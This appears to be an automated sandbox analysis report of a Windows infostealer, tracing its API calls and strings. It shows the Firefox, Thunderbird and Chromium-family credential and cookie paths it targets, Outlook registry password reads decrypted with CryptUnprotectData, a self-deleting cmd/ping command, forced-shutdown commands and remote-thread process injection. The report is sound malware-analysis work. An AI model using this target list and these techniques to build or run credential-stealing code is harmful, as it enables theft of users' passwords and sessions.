Part of subcall function 0040460A: lstrlenW.KERNEL32(00415E06,00000000,?,00415E06,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 00404613
Part of subcall function 0040460A: lstrlenW.KERNEL32(00415E06,?,00415E06,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 0040462A
Part of subcall function 0040460A: lstrcpyW.KERNEL32(75A901C0,00415E06), ref: 00404649

Part of subcall function 0040EB8E: lstrcpyW.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths\), ref: 0040EBCA
Part of subcall function 0040EB8E: lstrcatW.KERNEL32(?,thunderbird.exe), ref: 0040EBD8
Part of subcall function 0040EB8E: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,0040CD60,?,00000000), ref: 0040EBF1
Part of subcall function 0040EB8E: RegQueryValueExW.ADVAPI32(0040CD60,Path,00000000,?,?,?,?,00000000), ref: 0040EC0E
Part of subcall function 0040EB8E: RegCloseKey.ADVAPI32(0040CD60,?,00000000), ref: 0040EC17

lstrcatW.KERNEL32(?,\firefox.exe), ref: 0040D3FB
GetBinaryTypeW.KERNEL32(?,?), ref: 0040D40C
lstrlenW.KERNEL32(?,?,00000000), ref: 0040D444
lstrcpyW.KERNEL32(00000000,?), ref: 0040D45C
lstrlenW.KERNEL32(?,\Mozilla\Firefox\,?,00000000), ref: 0040D48B
lstrcpyW.KERNEL32(00000000,?), ref: 0040D4A4
GetPrivateProfileStringW.KERNEL32(?,Path,00000000,?,00000104,?), ref: 0040D4F6
lstrlenW.KERNEL32(00000000,00000001,00000000,Profile,?,00000000), ref: 0040D541
lstrcpyW.KERNEL32(00000000,00000000), ref: 0040D55A
lstrlenW.KERNEL32(?,?,00000001,00000000,Profile,?,00000000), ref: 0040D57C

Part of subcall function 00404656: lstrcpyW.KERNEL32(00000000,75A901C0), ref: 00404680

Part of subcall function 0040E331: GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,00000000), ref: 0040E362

WideCharToMultiByte.KERNEL32(00000000,00000200,?,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 0040D58E
lstrlenW.KERNEL32(?,?,00000000), ref: 0040D5A0
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 0040D5B4
lstrlenW.KERNEL32(?), ref: 0040D630
lstrcpyW.KERNEL32(00000000,?), ref: 0040D647
CopyFileW.KERNEL32(?,00000000,00000000,.tmp,00000000,004194E4,\logins.json), ref: 0040D6A5

Part of subcall function 00406F1D: VirtualFree.KERNELBASE(?,00000000,00008000,00406CE1,00000000,?,00414EA7,?,?,00417742), ref: 00406F25

Strings

profiles.ini, xrefs: 0040D4AA
\logins.json, xrefs: 0040D64D
Path, xrefs: 0040D4EE, 0040DA18
encryptedUsername, xrefs: 0040D72B, 0040D7B5
encryptedPassword, xrefs: 0040D7FC
\firefox.exe, xrefs: 0040D3EF
.tmp, xrefs: 0040D68E
hostname, xrefs: 0040D771
Profile, xrefs: 0040D38A, 0040D4B7, 0040D508
\Mozilla\Firefox\, xrefs: 0040D473
firefox.exe, xrefs: 0040D3CD

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcpy$ByteCharMultiWidelstrcat$BinaryCloseCopyCurrentDirectoryFileFreeOpenPrivateProfileQueryStringTypeValueVirtual
String ID: .tmp$Path$Profile$\Mozilla\Firefox\$\firefox.exe$\logins.json$encryptedPassword$encryptedUsername$firefox.exe$hostname$profiles.ini
API String ID: 2651140637-815594582
Opcode ID: d29a6d2515a05f9b76966c182b2a3949abef1b2156f434002ffd383235832a95
Instruction ID: 2d4c9bb049ab199aa7241abc1503c254cb061e83c5c4f1addf9997a6807221e4
Opcode Fuzzy Hash: d29a6d2515a05f9b76966c182b2a3949abef1b2156f434002ffd383235832a95
Instruction Fuzzy Hash: B7120771E0021AABDF04EFA1D8959EEBB79AF84348F10407EF506B7291DA385E45CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040314B Relevance: 52.8, APIs: 14, Strings: 16, Instructions: 285libraryprocessloaderCOMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(?,Path,00000000,?,00000104,?), ref: 0040323A

Part of subcall function 00406F1D: VirtualFree.KERNELBASE(?,00000000,00008000,00406CE1,00000000,?,00414EA7,?,?,00417742), ref: 00406F25

ExitProcess.KERNEL32 ref: 00403348

Part of subcall function 00413915: SHGetSpecialFolderPathW.SHELL32(00000000,?,00000005,00000000,?,?,?), ref: 00413946

Part of subcall function 00404656: lstrcpyW.KERNEL32(00000000,75A901C0), ref: 00404680

Part of subcall function 00413C34: SHFileOperationW.SHELL32(?,0000001C), ref: 00413C6B

Part of subcall function 0040460A: lstrlenW.KERNEL32(00415E06,00000000,?,00415E06,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 00404613
Part of subcall function 0040460A: lstrlenW.KERNEL32(00415E06,?,00415E06,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 0040462A
Part of subcall function 0040460A: lstrcpyW.KERNEL32(75A901C0,00415E06), ref: 00404649

Part of subcall function 00404477: wsprintfW.USER32 ref: 00404492

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403391
CharLowerW.USER32(?,\Documents:ApplicationData), ref: 0040340D
CharLowerW.USER32(?), ref: 00403414
lstrcmpW.KERNEL32(00000000,00000000), ref: 00403418
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040343F
CloseHandle.KERNEL32(?), ref: 0040344E
CloseHandle.KERNEL32(?), ref: 00403453
LoadLibraryA.KERNEL32(ntdll.dll,RtlAdjustPrivilege), ref: 00403477
GetProcAddress.KERNEL32(00000000), ref: 00403484
GetModuleHandleA.KERNEL32(ntdll.dll,NtRaiseHardError), ref: 0040348E
GetProcAddress.KERNEL32(00000000), ref: 00403495
WinExec.KERNEL32(shutdown.exe /r /t 00,00000000), ref: 004034C6

Strings

shutdown.exe /r /t 00, xrefs: 004034C1
Path, xrefs: 00403232
cmd.exe /C ping 1.2.3.4 -n 4 -w 1000 > Nul & cmd.exe /C , xrefs: 0040339A
ntdll.dll, xrefs: 00403471, 00403476, 0040348B
shutdown.exe /r /f /t 00, xrefs: 004034B9
\cookies.sqlite, xrefs: 0040325B
profiles.ini, xrefs: 004031EA
Local\Google\Chrome\User Data\Default\Network\Cookies, xrefs: 004031A6
RtlAdjustPrivilege, xrefs: 0040346C
\Microsoft\Edge\User Data\Default\cookies, xrefs: 00403285
\Microsoft\Windows\Cookies, xrefs: 004032D9
\Microsoft\Windows\INetCookies, xrefs: 004032AF
\Documents:ApplicationData, xrefs: 004033EF
Profile, xrefs: 004031F7
\Mozilla\Firefox\, xrefs: 004031D2
NtRaiseHardError, xrefs: 00403486

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: Handle$AddressCharCloseFileLowerModuleProcProcesslstrcpylstrlen$CreateExecExitFolderFreeLibraryLoadNameOperationPathPrivateProfileSpecialStringVirtuallstrcmpwsprintf
String ID: Local\Google\Chrome\User Data\Default\Network\Cookies$NtRaiseHardError$Path$Profile$RtlAdjustPrivilege$\Documents:ApplicationData$\Microsoft\Edge\User Data\Default\cookies$\Microsoft\Windows\Cookies$\Microsoft\Windows\INetCookies$\Mozilla\Firefox\$\cookies.sqlite$cmd.exe /C ping 1.2.3.4 -n 4 -w 1000 > Nul & cmd.exe /C $ntdll.dll$profiles.ini$shutdown.exe /r /f /t 00$shutdown.exe /r /t 00
API String ID: 1931931590-2678339517
Opcode ID: 0cb3ba3c8163685de2d91e7d83fbe40547e866007a735cfc36eead9e6383e22a
Instruction ID: 4265ecc0976d2b9fe99417966afe16aed46102f78ebeba7bbf6205ad4cafaebd
Opcode Fuzzy Hash: 0cb3ba3c8163685de2d91e7d83fbe40547e866007a735cfc36eead9e6383e22a
Instruction Fuzzy Hash: 41916EB2900109ABDB15EFA1DC969EEBB7CAF44304F00447AF506B7191DB786F85CE68

Uniqueness

Uniqueness Score: -1.00%

Function 0040CD01 Relevance: 51.2, APIs: 19, Strings: 10, Instructions: 491stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040460A: lstrlenW.KERNEL32(00415E06,00000000,?,00415E06,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 00404613
Part of subcall function 0040460A: lstrlenW.KERNEL32(00415E06,?,00415E06,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 0040462A
Part of subcall function 0040460A: lstrcpyW.KERNEL32(75A901C0,00415E06), ref: 00404649

Part of subcall function 0040EB8E: lstrcpyW.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths\), ref: 0040EBCA
Part of subcall function 0040EB8E: lstrcatW.KERNEL32(?,thunderbird.exe), ref: 0040EBD8
Part of subcall function 0040EB8E: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,0040CD60,?,00000000), ref: 0040EBF1
Part of subcall function 0040EB8E: RegQueryValueExW.ADVAPI32(0040CD60,Path,00000000,?,?,?,?,00000000), ref: 0040EC0E
Part of subcall function 0040EB8E: RegCloseKey.ADVAPI32(0040CD60,?,00000000), ref: 0040EC17

GetBinaryTypeW.KERNEL32(?,?), ref: 0040CD7E

Part of subcall function 00404656: lstrcpyW.KERNEL32(00000000,75A901C0), ref: 00404680

Part of subcall function 0040DF9D: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,?,00000000), ref: 0040DFCB
Part of subcall function 0040DF9D: SetCurrentDirectoryW.KERNEL32(?,?,00000000), ref: 0040DFD4
Part of subcall function 0040DF9D: PathFileExistsW.SHLWAPI(0040CD97,.dll,?,?,msvcr,?,msvcp,?,softokn3.dll,?,mozglue.dll,?,msvcp120.dll,?,msvcr120.dll,?), ref: 0040E0C2

lstrlenW.KERNEL32(?,\Thunderbird\,?), ref: 0040CDD2
lstrcpyW.KERNEL32(00000000,?), ref: 0040CDEB
GetPrivateProfileStringW.KERNEL32(?,Path,00000000,?,00000104,?), ref: 0040CE3E

Part of subcall function 0040DF9D: PathFileExistsW.SHLWAPI(0040CD97,.dll,0000005A,?,0040CD97,?,00000000), ref: 0040E11E
Part of subcall function 0040DF9D: LoadLibraryW.KERNEL32(?,0040CD97,?,00000000), ref: 0040E15D
Part of subcall function 0040DF9D: LoadLibraryW.KERNEL32(?,?,00000000), ref: 0040E168
Part of subcall function 0040DF9D: LoadLibraryW.KERNEL32(?,?,00000000), ref: 0040E173
Part of subcall function 0040DF9D: LoadLibraryW.KERNEL32(?,?,00000000), ref: 0040E17E
Part of subcall function 0040DF9D: LoadLibraryW.KERNEL32(?,?,00000000), ref: 0040E189
Part of subcall function 0040DF9D: SetCurrentDirectoryW.KERNEL32(?,?,00000000), ref: 0040E288

lstrlenW.KERNEL32(00000000,00000001,00000000,Profile), ref: 0040CE86
lstrcpyW.KERNEL32(00000000,00000000), ref: 0040CE9F
lstrlenW.KERNEL32(?,?,00000001,00000000,Profile), ref: 0040CEC1
WideCharToMultiByte.KERNEL32(00000000,00000200,?,00000000,00000000,00000000,00000000,00000000), ref: 0040CED3
lstrlenW.KERNEL32(?), ref: 0040CEE5
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0040CEF9
lstrlenW.KERNEL32(?), ref: 0040CF7B

Strings

profiles.ini, xrefs: 0040CDF1
\logins.json, xrefs: 0040CF98
encryptedUsername, xrefs: 0040D076, 0040D100
encryptedPassword, xrefs: 0040D13B
Path, xrefs: 0040CE38, 0040D32C
thunderbird.exe, xrefs: 0040CD56
hostname, xrefs: 0040D0BC
.tmp, xrefs: 0040CFD9
Profile, xrefs: 0040CD12, 0040CDFE, 0040CE4D
\Thunderbird\, xrefs: 0040CDBA

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: lstrlen$LibraryLoadlstrcpy$CurrentDirectory$ByteCharExistsFileMultiPathWide$BinaryCloseOpenPrivateProfileQueryStringTypeValuelstrcat
String ID: .tmp$Path$Profile$\Thunderbird\$\logins.json$encryptedPassword$encryptedUsername$hostname$profiles.ini$thunderbird.exe
API String ID: 1774285296-1863067114
Opcode ID: b916cd015d158bbb03655be9dfce1aa3a4f38cd9fb4c8e5bc45967f6bb9d5b2f
Instruction ID: 451e6df0fac295441d98195a47e496d55b381d8a8e9dc9d320c9af4b26fda339
Opcode Fuzzy Hash: b916cd015d158bbb03655be9dfce1aa3a4f38cd9fb4c8e5bc45967f6bb9d5b2f
Instruction Fuzzy Hash: B602E971E0021AABDB04EFA1DC95AEEBB79AF44344F10407EF506B7291DA385E45CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040EC28 Relevance: 39.0, Strings: 31, Instructions: 278COMMON

Download Yara Rule

Strings

\UCBrowser\User Data_i18n\Default\UC Login Data.17, xrefs: 0040EDD8
\Slimjet\User Data\Default\Login Data, xrefs: 0040EECB
\Blisk\User Data\Local State, xrefs: 0040EE24
\Comodo\Dragon\User Data\Local State, xrefs: 0040EE90
\Google\Chrome Beta\User Data\Default\Login Data, xrefs: 0040ED87
\Chromium\User Data\Local State, xrefs: 0040EE3F
\Slimjet\User Data\Local State, xrefs: 0040EEC6
\Google\Chrome\User Data\Local State, xrefs: 0040ECAE
\BraveSoftware\Brave-Browser\User Data\Local State, xrefs: 0040EE58
\Torch\User Data\Default\Login Data, xrefs: 0040EEB0
\Chromium\User Data\Default\Login Data, xrefs: 0040EE44
\Comodo\Dragon\User Data\Default\Login Data, xrefs: 0040EE95
\Opera Software\Opera Stable\Login Data, xrefs: 0040EE0E
\Blisk\User Data\Default\Login Data, xrefs: 0040EE29
\CentBrowser\User Data\Default\Login Data, xrefs: 0040EEE6
\BraveSoftware\Brave-Browser\User Data\Default\Login Data, xrefs: 0040EE5D
\Vivaldi\User Data\Default\Login Data, xrefs: 0040EE7A
\Torch\User Data\Local State, xrefs: 0040EEAB
\Opera Software\Opera Stable\Local State, xrefs: 0040EE09
\CentBrowser\User Data\Local State, xrefs: 0040EEE1
\Tencent\QQBrowser\User Data\Local State, xrefs: 0040EDEE
\Google\Chrome Beta\User Data\Local State, xrefs: 0040ED82
\UCBrowser\User Data_i18n\Local State, xrefs: 0040EDD3
\Microsoft\Edge\User Data\Default\Login Data, xrefs: 0040EDBD
\Tencent\QQBrowser\User Data\Default\Login Data, xrefs: 0040EDF3
\Google\Chrome\User Data\Default\Network\Cookies, xrefs: 0040ECB3
\Epic Privacy Browser\User Data\Local State, xrefs: 0040ED9D
\Vivaldi\User Data\Local State, xrefs: 0040EE75
\Microsoft\Edge\User Data\Local State, xrefs: 0040EDB8
\Epic Privacy Browser\User Data\Default\Login Data, xrefs: 0040EDA2
?/@, xrefs: 0040EF60

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: File$ExistsPath$ByteCharCopyMultiWidelstrlen$EntryPointPrivateProfileString
String ID: ?/@$\Blisk\User Data\Default\Login Data$\Blisk\User Data\Local State$\BraveSoftware\Brave-Browser\User Data\Default\Login Data$\BraveSoftware\Brave-Browser\User Data\Local State$\CentBrowser\User Data\Default\Login Data$\CentBrowser\User Data\Local State$\Chromium\User Data\Default\Login Data$\Chromium\User Data\Local State$\Comodo\Dragon\User Data\Default\Login Data$\Comodo\Dragon\User Data\Local State$\Epic Privacy Browser\User Data\Default\Login Data$\Epic Privacy Browser\User Data\Local State$\Google\Chrome Beta\User Data\Default\Login Data$\Google\Chrome Beta\User Data\Local State$\Google\Chrome\User Data\Default\Network\Cookies$\Google\Chrome\User Data\Local State$\Microsoft\Edge\User Data\Default\Login Data$\Microsoft\Edge\User Data\Local State$\Opera Software\Opera Stable\Local State$\Opera Software\Opera Stable\Login Data$\Slimjet\User Data\Default\Login Data$\Slimjet\User Data\Local State$\Tencent\QQBrowser\User Data\Default\Login Data$\Tencent\QQBrowser\User Data\Local State$\Torch\User Data\Default\Login Data$\Torch\User Data\Local State$\UCBrowser\User Data_i18n\Default\UC Login Data.17$\UCBrowser\User Data_i18n\Local State$\Vivaldi\User Data\Default\Login Data$\Vivaldi\User Data\Local State
API String ID: 1487857545-3224726860
Opcode ID: adf6be629bfc72370679c70d46d2a5c68d286e75fe535ee85c4ae15d9743018b
Instruction ID: 5566ebd5736e3d9484b1aae371dbe7a1aaae54774418534ab2effb1b6e0b9942
Opcode Fuzzy Hash: adf6be629bfc72370679c70d46d2a5c68d286e75fe535ee85c4ae15d9743018b
Instruction Fuzzy Hash: 8EA19274241200AFD214EF52DDE2DA673A9EBC9708B10443EF9566B2E1EB786C45CF1E

Uniqueness

Uniqueness Score: -1.00%

Function 0040C8FC Relevance: 33.5, APIs: 10, Strings: 9, Instructions: 283registrystringCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(?,Account Name,00000000,00000000,?,?,0040C8C0,?), ref: 0040C94E
RegQueryValueExW.ADVAPI32(?,Email,00000000,00000000,?,00001000), ref: 0040C995
RegQueryValueExW.ADVAPI32(?,POP3 Server,00000000,00000000,?,00001000), ref: 0040C9D9
RegQueryValueExW.ADVAPI32(?,POP3 User,00000000,00000000,?,00001000), ref: 0040CA1D
RegQueryValueExW.ADVAPI32(?,SMTP Server,00000000,00000000,?,00001000), ref: 0040CA61
RegQueryValueExW.ADVAPI32(?,POP3 Password,00000000,00000000,?,00001000), ref: 0040CAA5
RegQueryValueExW.ADVAPI32(?,SMTP Password,00000000,00000000,?,00001000), ref: 0040CB12
RegQueryValueExW.ADVAPI32(?,HTTP Password,00000000,00000000,?,00001000), ref: 0040CB7F
RegQueryValueExW.ADVAPI32(?,IMAP Password,00000000,00000000,?,00001000), ref: 0040CBEC

Part of subcall function 0040CC6B: GlobalAlloc.KERNEL32(00000040,-00000001,75A8E8E0,?,?,?,0040CC18,00001000,?,00000000,00001000), ref: 0040CC89
Part of subcall function 0040CC6B: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040CC18), ref: 0040CCBF
Part of subcall function 0040CC6B: lstrcpyW.KERNEL32(?,Could not decrypt), ref: 0040CCF6

lstrlenW.KERNEL32(00000000), ref: 0040CC3A

Strings

POP3 Password, xrefs: 0040CA9F
IMAP Password, xrefs: 0040CBE6
SMTP Password, xrefs: 0040CB0C
POP3 User, xrefs: 0040CA17
HTTP Password, xrefs: 0040CB79
Account Name, xrefs: 0040C948
POP3 Server, xrefs: 0040C9D3
SMTP Server, xrefs: 0040CA5B
Email, xrefs: 0040C98F

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: QueryValue$AllocCryptDataGlobalUnprotectlstrcpylstrlen
String ID: Account Name$Email$HTTP Password$IMAP Password$POP3 Password$POP3 Server$POP3 User$SMTP Password$SMTP Server
API String ID: 6593746-2537589853
Opcode ID: 10da2d0102921c99ffb6ce97c0e051f389342a5e90700a9c16ccb5b7215e51f8
Instruction ID: 2b43134d409b4dccb308800c99ab8f740ae5a1e621cc1b93451e34efe1dd3d5d
Opcode Fuzzy Hash: 10da2d0102921c99ffb6ce97c0e051f389342a5e90700a9c16ccb5b7215e51f8
Instruction Fuzzy Hash: 9BA143B2D0021DAAEB21E7A4CC45FDF737CAB04744F1041BAB608F21D1E6746B99DB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040820B Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 96networkCOMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(microsoft.com,00000000,?,?), ref: 0040824B
socket.WS2_32(00000002,00000001,00000000), ref: 00408263
htons.WS2_32(00000050), ref: 00408283
freeaddrinfo.WS2_32(?), ref: 00408290
WSAConnect.WS2_32(00000000,?,00000010,00000000,00000000,00000000,00000000), ref: 004082A1
send.WS2_32(00000000,GET http://microsoft.com/ HTTP/1.1Host: microsoft.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Langu,0000016C,00000000), ref: 004082B8
EntryPoint.DBKYOVYK(00000200), ref: 004082C3

Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,?,00415E3C,02800000,?,?,00000000,?,?,00417531), ref: 00401006
Part of subcall function 00401000: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00417531), ref: 0040100D

recv.WS2_32(00000000,00000000,00000200,00000000), ref: 004082D3

Part of subcall function 00408179: StrStrA.SHLWAPI(?,Date), ref: 00408187
Part of subcall function 00408179: InternetTimeToSystemTimeA.WININET(00000007,?,00000000,?,Date), ref: 004081B1
Part of subcall function 00408179: GetLastError.KERNEL32(?,Date), ref: 004081C1
Part of subcall function 00408179: SystemTimeToFileTime.KERNEL32(?,?,?,Date), ref: 004081CB
Part of subcall function 00408179: GetLastError.KERNEL32(?,Date), ref: 004081D5
Part of subcall function 00408179: WsFileTimeToDateTime.WEBSERVICES(?,?,00000000,?,Date), ref: 004081E1
Part of subcall function 00408179: __aulldiv.LIBCMT ref: 004081F9

Part of subcall function 00401014: GetProcessHeap.KERNEL32(00000000,00000000,00415E1C,00000000,00000000,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 0040101A
Part of subcall function 00401014: RtlFreeHeap.NTDLL(00000000,?,75A901C0,00000000), ref: 00401021

closesocket.WS2_32(00000000), ref: 004082F0

Strings

microsoft.com, xrefs: 0040822E
GET http://microsoft.com/ HTTP/1.1Host: microsoft.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Langu, xrefs: 004082B2

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: Time$Heap$ErrorFileLastProcessSystem$AllocateConnectDateEntryFreeInternetPoint__aulldivclosesocketfreeaddrinfogetaddrinfohtonsrecvsendsocket
String ID: GET http://microsoft.com/ HTTP/1.1Host: microsoft.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Langu$microsoft.com
API String ID: 1829919146-1768319801
Opcode ID: 286a8902b26ebca66023954103ac6c313ec34fe4ddf8feebc28427e296978b62
Instruction ID: 31d1e0bf991de71becd334843a30d6107e85d72d756c0e6f9d38eb5fc745d24d
Opcode Fuzzy Hash: 286a8902b26ebca66023954103ac6c313ec34fe4ddf8feebc28427e296978b62
Instruction Fuzzy Hash: 30319371A00348BBDB109BA6DC8DEDF7BB8EBC8B10F10812AF911A62D1D6744D40CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00410E64 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 55servicesleepCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001,?,00000001,?,00411646,?,?,00000002,00000000,00000000,?,00000000), ref: 00410E73
OpenServiceW.ADVAPI32(00000000,00000000,00000010,00000000,?,00411646,?,?,00000002,00000000,00000000,?,00000000), ref: 00410E88
CloseServiceHandle.ADVAPI32(00000000,?,00411646,?,?,00000002,00000000,00000000,?,00000000), ref: 00410E95
StartServiceW.ADVAPI32(00000000,00000000,00000000,?,00411646,?,?,00000002,00000000,00000000,?,00000000), ref: 00410EA2
GetLastError.KERNEL32(?,00411646,?,?,00000002,00000000,00000000,?,00000000), ref: 00410EAC
Sleep.KERNEL32(000007D0,?,00411646,?,?,00000002,00000000,00000000,?,00000000), ref: 00410EBE
StartServiceW.ADVAPI32(00000000,00000000,00000000,?,00411646,?,?,00000002,00000000,00000000,?,00000000), ref: 00410EC7
CloseServiceHandle.ADVAPI32(00000000,?,00411646,?,?,00000002,00000000,00000000,?,00000000), ref: 00410EDB
CloseServiceHandle.ADVAPI32(00000000,?,00411646,?,?,00000002,00000000,00000000,?,00000000), ref: 00410EDE

Strings

ServicesActive, xrefs: 00410E6B

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$OpenStart$ErrorLastManagerSleep
String ID: ServicesActive
API String ID: 104619213-3071072050
Opcode ID: 1d7c60f97757fbe08e78190aaafd62837d2c663b851753f40d99a36a5a7ae895
Instruction ID: 68459d15a12f62ce24ccc1a4f22d0c0991d762a7085e1fcee92784addf14fb49
Opcode Fuzzy Hash: 1d7c60f97757fbe08e78190aaafd62837d2c663b851753f40d99a36a5a7ae895
Instruction Fuzzy Hash: 87012171A00364BBD6201777AC5CEDB3E6CDBCA751B008836F505E2251CBA98C80C6B9

Uniqueness

Uniqueness Score: -1.00%

Function 00415FE0 Relevance: 15.1, APIs: 10, Instructions: 82injectionmemorythreadCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(001FFFFF,00000000,00000000,?,75A901C0,00000000), ref: 00415FF4
GetCurrentProcessId.KERNEL32(?,75A901C0,00000000), ref: 00415FFF
EntryPoint.DBKYOVYK(000000FF,?,75A901C0,00000000), ref: 00416011

Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,?,00415E3C,02800000,?,?,00000000,?,?,00417531), ref: 00401006
Part of subcall function 00401000: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00417531), ref: 0040100D

GetModuleFileNameA.KERNEL32(00000000,00000000,000000FF,?,75A901C0,00000000), ref: 0041601D
VirtualAllocEx.KERNEL32(00000000,00000000,00000800,00003000,00000040,?,75A901C0,00000000), ref: 0041604A
WriteProcessMemory.KERNEL32(00000000,00000000,0041E158,00000800,00000000,?,75A901C0,00000000), ref: 00416062
VirtualProtectEx.KERNEL32(00000000,00000000,00000800,00000040,75A901C0,?,75A901C0,00000000), ref: 00416073
VirtualAllocEx.KERNEL32(00000000,00000000,00000103,00003000,00000004,?,75A901C0,00000000), ref: 0041608A
WriteProcessMemory.KERNEL32(00000000,00000000,?,00000103,00000000,?,75A901C0,00000000), ref: 004160A0
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,0000010E,00000000,00000000,00000000), ref: 004160B3

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: Process$Virtual$AllocHeapMemoryWrite$AllocateCreateCurrentEntryFileModuleNameOpenPointProtectRemoteThread
String ID:
API String ID: 2127867389-0
Opcode ID: 7a2fb275f9eb4e9b4af05cb2c2cff9a4da350a5e77a9d07bdb3636d47345a416
